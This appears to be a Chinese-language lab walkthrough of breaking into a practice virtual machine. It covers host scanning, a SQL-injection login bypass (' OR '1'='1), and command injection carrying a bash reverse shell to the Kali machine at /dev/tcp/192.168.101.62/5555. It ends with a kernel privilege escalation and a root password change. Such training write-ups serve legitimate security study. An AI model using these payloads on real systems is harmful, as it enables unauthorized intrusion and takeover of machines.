靶機滲透
| 主機 | IP |
|---|---|
| kali | 192.168.101.62 |
| 靶機 | 未知 |
靶機探測
1.打開靶機

選擇我已移動該虛擬機

- 打開kali進行資訊收集
netdiscover -i eth1 -r 192.168.101.0/24 #探測主機

因為這里使用的橋接網卡所以可以探測當前路由器連接的所有設備,
這里看名字可以得到虛擬機ip:192.168.101.63
使用nmap探測發現開放80

- 訪問web界面

發現登錄框,使用弱密碼登錄失敗,使用sql注入,
萬能密碼
賬號:隨便
密碼:' OR '1'='1
進入下個界面
命令執行漏洞

這里應該是命令執行漏洞

命令執行漏洞是利用Linux一行命令執行多條命令這一特點,使用分號";"、連字符"&、&&"、豎線"||"連接兩條命令進行shell反彈,
我們這里嘗試使用命令進行查看主機密碼

查看用戶組態檔

嘗試查看密碼

權限提升
發現權限不夠
這里我們利用漏洞反彈shell
使用kali中的nc工具開一個監聽埠
nc -lvp 5555

在web界面執行
127.0.0.1;bash -i >& /dev/tcp/192.168.101.62/5555 0>&1


這里成功反彈shell

執行命令查看當前Linux版本,到網上尋找提權腳本,
linux 2.6.9-55.el i686 exploit


在kali中新建一個shell
開啟apache2并把提權腳本放入web目錄下

然后使用反彈的shell進行下載提權腳本到靶機內
因為tmp目錄權限較高,進入tmp目錄下載提權腳本,
進行編譯提權

修改root密碼實作ssh登錄

使用ssh工具連接


連接成功,成功滲透,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/289491.html
標籤:其他
